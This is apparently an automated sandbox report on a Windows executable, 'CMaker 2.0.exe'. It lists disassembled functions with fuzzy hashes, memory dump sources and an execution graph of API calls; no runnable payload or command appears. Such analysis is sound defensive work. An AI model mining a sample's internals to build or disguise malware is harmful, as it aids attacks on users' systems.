                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                  • API String ID: 3580290477-2216745502
                                                                                                                                                                                  • Opcode ID: 9ce12ff3a883e124a6cc238180b9094a15e3d479f9e0930c5f1db475a7f69b26
                                                                                                                                                                                  • Instruction ID: 36a7fa7b14d781534118eb1034c2535765f297f3acd69d3c8dd0a3e278423487
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ce12ff3a883e124a6cc238180b9094a15e3d479f9e0930c5f1db475a7f69b26
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041933AA09B1286EB14DFA5A5400B826A4FF457C4B98907EEA5DC3BC5EF3DE451D300
                                                                                                                                                                                  Function 00007FF6FAC003DC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                                  • Opcode ID: 3e70955a61d403852169feba9daedd801f1552a1b7cd6f86facb1308b23a296b
                                                                                                                                                                                  • Instruction ID: beb4df30e8bc812d13d7fb72c5b811c9d9d9309b51880ec70d989ab4fa2dce3d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e70955a61d403852169feba9daedd801f1552a1b7cd6f86facb1308b23a296b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23418D62F18B1288FB109BF198511FC26B46F05748F9A5079DE2DE7ACAFF389441D314
                                                                                                                                                                                  Function 00007FF6FABFC8B8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                  • Opcode ID: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction ID: aefef38375c9d439bbdae149e790bdf0e61b48d2cd66cb816b743ce3bdfd6143
                                                                                                                                                                                  • Opcode Fuzzy Hash: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD41B162A18A8182DB20CF65E4443AA67A4FB99794F858135EE5DC7788EF3CD441CB40
                                                                                                                                                                                  Function 00007FF6FABFF4B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                  • Opcode ID: 7534d7f871db88e8959d133b0fbbcb23c94031a958284f43d8d7821fe7dec308
                                                                                                                                                                                  • Instruction ID: 0ae4c404fa792f52f49901e8d4eec7b4ce1a4221cc8244077f93b4d1f39f11af
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7534d7f871db88e8959d133b0fbbcb23c94031a958284f43d8d7821fe7dec308
                                                                                                                                                                                  • Instruction Fuzzy Hash: E621D076A1868281EB20CF65D04427D63B1FB89B84F898179DAADC36C4EF7CE945CB50
                                                                                                                                                                                  Function 00007FF6FABEE178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                  • Opcode ID: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction ID: fbe67153f4002d970dd205161bf6df02589c3b1ee225cb0250aaa652519e4b00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07113D32618B8582EB218F15F44026977E5FB89B94F5882B0EF9D877A4EF7CD591CB00
                                                                                                                                                                                  Function 00007FF6FAC00548 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                  • Opcode ID: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction ID: e1c323294f1923bcc1d7599522ec416e0c48527dfaff9124c543c5eabf648324
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1018FA5A1C60286FB30EF60A46127E63B0EF49704FC6A079D56DC66C5FE3CE6049B18

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00007FFD344E0C11 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7e8de9514f87f660b2669bf331626759cb7873f9e4b2f3bb7c65c6f6a17e39ab
                                                                                                                                                                                  • Instruction ID: 401c55072a5553988daae1ebf78f023ed8eaf6f9c5fbf7b4557836088ad56ddf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e8de9514f87f660b2669bf331626759cb7873f9e4b2f3bb7c65c6f6a17e39ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CD1B830B089198FEB98EB6CC4A8ABA73D1FF55311F154679E52EC32D5DE78AC818740
                                                                                                                                                                                  Function 00007FFD344E1550 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ac28b8f1991db12912ee55f3ec86c340d3b1268367c52f1c7b1e8926909736e3
                                                                                                                                                                                  • Instruction ID: e9f7b6beda1163d56da689c46a55b593fd5747845311815731b908490421b925
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac28b8f1991db12912ee55f3ec86c340d3b1268367c52f1c7b1e8926909736e3
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7711B51F58A490FE798EB3C48A93B6ABD2FFA9710F4901BAD04DC32D7DD686C818341
                                                                                                                                                                                  Function 00007FFD344E05A0 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 81445f385d9b4224a72993052f6ebdccb8fcb72f077a0ceb8e386a4856ef345e
                                                                                                                                                                                  • Instruction ID: 59be9c42c86edf13025325840d07efe53721c826cd50d4afc115299d14673550
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81445f385d9b4224a72993052f6ebdccb8fcb72f077a0ceb8e386a4856ef345e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301DF2168D6D51FD303A77858E55A6BF25AB87200B8944EAE089D7297D92C69098341
                                                                                                                                                                                  Function 00007FFD344E04D0 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e976c7d52d63b22fb31b56c4490941d8cc1a2fff822a0a8f0b56688dff487660
                                                                                                                                                                                  • Instruction ID: 980de2122fad2ce61b5d2fd623980fe23cd54e90c36826b9455a6db1b309000c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e976c7d52d63b22fb31b56c4490941d8cc1a2fff822a0a8f0b56688dff487660
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA710861F58A490FE798EB6C48A93BAB7D2FF99250F49017AD04DC32D7DE6C6C818341
                                                                                                                                                                                  Function 00007FFD344E08E9 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1749691f7c22d01182ba3dbadb174c26e2a15cfc8dbed11777ddf6939aa11ec4
                                                                                                                                                                                  • Instruction ID: 04faf02927dee1cc490676bc6499171e82f2a5cf7bdd25e46704cef2c2b85943
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1749691f7c22d01182ba3dbadb174c26e2a15cfc8dbed11777ddf6939aa11ec4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B415921B19A880FD719EB3C986567A7BE1EF9B301B0941F6E18EC7267D92CDC428740
                                                                                                                                                                                  Function 00007FFD344E1169 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: de195d68ccb489dfe31e6f00339a87b8d4f55420889985828831f62bfc827906
                                                                                                                                                                                  • Instruction ID: a91e643d85a3504db1666530c51b048150f2570d9422f02667d9f3a74bde3169
                                                                                                                                                                                  • Opcode Fuzzy Hash: de195d68ccb489dfe31e6f00339a87b8d4f55420889985828831f62bfc827906
                                                                                                                                                                                  • Instruction Fuzzy Hash: D331C871ACD2D11FD31653306C638E3BBA49F47325B1E02B7D449CB993C95E668383A2
                                                                                                                                                                                  Function 00007FFD344E1259 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0d65a0279c3d3ea30dda0c5234f3346f5067ff2772104341f88052511d2e07df
                                                                                                                                                                                  • Instruction ID: 98472af5227f6413b04a1349b395fc648d84b722caed82b8f44daea62b6100ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d65a0279c3d3ea30dda0c5234f3346f5067ff2772104341f88052511d2e07df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3701F902B4D9450FF754A67C1CF96F6A7C2DFAA311B0941B6D14CC3197DC4DAC825350
                                                                                                                                                                                  Function 00007FFD344E04D8 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 90b07c6e207da20d7b07a2537d0eadc698b6f100946f054e98050af6a016f546
                                                                                                                                                                                  • Instruction ID: f1d748c48359f3d08b317994e2529d0825bbfc1ec012cc7a44460363f5445558
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b07c6e207da20d7b07a2537d0eadc698b6f100946f054e98050af6a016f546
                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F0C812B499090BF7A4A5BC1CF96FA97C2DBA9351F050179E50DC3287DC9DAC826340
                                                                                                                                                                                  Function 00007FFD344E0A59 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9adeea18e65b702053f7628ec35600161e45a229187874c6b30f22601e01a15b
                                                                                                                                                                                  • Instruction ID: a6302a88b28e77a8f75e8494e80dcb29d71ce5e0db5bf3bb2afa705d240925d1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9adeea18e65b702053f7628ec35600161e45a229187874c6b30f22601e01a15b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6301F120A0E2E20FE752637008B66F63F919F53320F0E81FAE55CCA0D3CE9E58829341
                                                                                                                                                                                  Function 00007FFD344E04E0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d46b38ca7ee14a51384be16704feb26b9375cf5af097d38622dc87eac4bfbc43
                                                                                                                                                                                  • Instruction ID: c469906a94bbcf846aadb4c1cc8d242555ad869f760fc332aea614c900e5bad6
                                                                                                                                                                                  • Opcode Fuzzy Hash: d46b38ca7ee14a51384be16704feb26b9375cf5af097d38622dc87eac4bfbc43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0A430B689194BE654A73898A56AAF2D2FFCD301F100539D50EC3385DE6CA8415785
                                                                                                                                                                                  Function 00007FFD344E0BA5 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000002.2211365691.00007FFD344E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd344e0000_1.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 191551a66b8ba475c8e0d97d5b23cc30314cc3f2427df5426cb743501d0e6926
                                                                                                                                                                                  • Instruction ID: 264b98bf15daf6bb026a1d91e13a159278e12bf542bc708253eee18814cbbc55
                                                                                                                                                                                  • Opcode Fuzzy Hash: 191551a66b8ba475c8e0d97d5b23cc30314cc3f2427df5426cb743501d0e6926
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF04611A0C6650FE344B66898B66BB7BD1EB96320B4908B9E808DA1A7EA1CD9814341

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:2.9%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:1.1%
                                                                                                                                                                                  Total number of Nodes:749
                                                                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                                                                  execution_graph 79680 7ffd9f3b89c8 79681 7ffd9f3b89d0 79680->79681 79684 7ffd9f3b8a15 79681->79684 79685 7ffd9f3b4720 WSAGetLastError 79681->79685 79686 7ffd9f3b4028 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind select 79681->79686 79685->79681 79686->79681 79687 7ff6fabf5444 79688 7ff6fabf545e 79687->79688 79689 7ff6fabf547b 79687->79689 79712 7ff6fabfb0e8 11 API calls _get_daylight 79688->79712 79689->79688 79691 7ff6fabf548e CreateFileW 79689->79691 79693 7ff6fabf54c2 79691->79693 79694 7ff6fabf54f8 79691->79694 79692 7ff6fabf5463 79713 7ff6fabfb108 11 API calls _get_daylight 79692->79713 79715 7ff6fabf5598 59 API calls 3 library calls 79693->79715 79716 7ff6fabf5a20 46 API calls 3 library calls 79694->79716 79698 7ff6fabf54fd 79701 7ff6fabf5501 79698->79701 79702 7ff6fabf552c 79698->79702 79699 7ff6fabf546b 79714 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79699->79714 79700 7ff6fabf54d0 79704 7ff6fabf54ed CloseHandle 79700->79704 79705 7ff6fabf54d7 CloseHandle 79700->79705 79717 7ff6fabfb07c 11 API calls 2 library calls 79701->79717 79718 7ff6fabf57e0 51 API calls 79702->79718 79706 7ff6fabf5476 79704->79706 79705->79706 79709 7ff6fabf5539 79719 7ff6fabf591c 21 API calls _fread_nolock 79709->79719 79711 7ff6fabf550b 79711->79706 79712->79692 79713->79699 79714->79706 79715->79700 79716->79698 79717->79711 79718->79709 79719->79711 79720 7ff6fabe1fa0 79721 7ff6fabe1fb0 79720->79721 79722 7ff6fabe2001 79721->79722 79723 7ff6fabe1feb 79721->79723 79725 7ff6fabe2021 79722->79725 79735 7ff6fabe2037 __vcrt_freefls 79722->79735 79724 7ff6fabe1df0 81 API calls 79723->79724 79738 7ff6fabe1ff7 79724->79738 79726 7ff6fabe1df0 81 API calls 79725->79726 79726->79738 79730 7ff6fabe2226 79732 7ff6fabe1df0 81 API calls 79730->79732 79732->79738 79733 7ff6fabe2210 79734 7ff6fabe1df0 81 API calls 79733->79734 79734->79738 79735->79730 79735->79733 79736 7ff6fabe21ea 79735->79736 79735->79738 79739 7ff6fabe21c7 79735->79739 79741 7ff6fabe1420 79735->79741 79765 7ff6fabe1bd0 79735->79765 79737 7ff6fabe1df0 81 API calls 79736->79737 79737->79738 79775 7ff6fabea9b0 79738->79775 79769 7ff6fabe1df0 GetCurrentProcessId 79739->79769 79784 7ff6fabe31a0 79741->79784 79744 7ff6fabe144b 79747 7ff6fabe1df0 81 API calls 79744->79747 79745 7ff6fabe146c 79794 7ff6fabeeacc 79745->79794 79749 7ff6fabe145b 79747->79749 79748 7ff6fabe1481 79750 7ff6fabe1485 79748->79750 79751 7ff6fabe14a1 79748->79751 79749->79735 79820 7ff6fabe1db0 80 API calls 79750->79820 79753 7ff6fabe14d1 79751->79753 79754 7ff6fabe14b1 79751->79754 79757 7ff6fabe14d7 79753->79757 79762 7ff6fabe14ea 79753->79762 79821 7ff6fabe1db0 80 API calls 79754->79821 79798 7ff6fabe11d0 79757->79798 79758 7ff6fabe1564 79758->79735 79760 7ff6fabe149c __vcrt_freefls 79816 7ff6fabee444 79760->79816 79762->79760 79763 7ff6fabe1576 79762->79763 79822 7ff6fabee794 79762->79822 79825 7ff6fabe1db0 80 API calls 79763->79825 79766 7ff6fabe1bf5 79765->79766 80043 7ff6fabf4764 79766->80043 79770 7ff6fabe1e1a 79769->79770 80070 7ff6fabe1d60 79770->80070 79776 7ff6fabea9b9 79775->79776 79777 7ff6fabe21ba 79776->79777 79778 7ff6fabead40 IsProcessorFeaturePresent 79776->79778 79779 7ff6fabead58 79778->79779 80104 7ff6fabeaf38 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 79779->80104 79781 7ff6fabead6b 80105 7ff6fabead00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 79781->80105 79785 7ff6fabe31ac 79784->79785 79826 7ff6fabe7800 79785->79826 79787 7ff6fabe31d4 79788 7ff6fabe7800 2 API calls 79787->79788 79789 7ff6fabe31e7 79788->79789 79831 7ff6fabf5db4 79789->79831 79792 7ff6fabea9b0 _log10_special 8 API calls 79793 7ff6fabe1443 79792->79793 79793->79744 79793->79745 79795 7ff6fabeeafc 79794->79795 79999 7ff6fabee85c 79795->79999 79797 7ff6fabeeb15 79797->79748 79799 7ff6fabe1228 79798->79799 79800 7ff6fabe122f 79799->79800 79801 7ff6fabe1257 79799->79801 79802 7ff6fabe1df0 81 API calls 79800->79802 79804 7ff6fabe1271 79801->79804 79805 7ff6fabe128d 79801->79805 79803 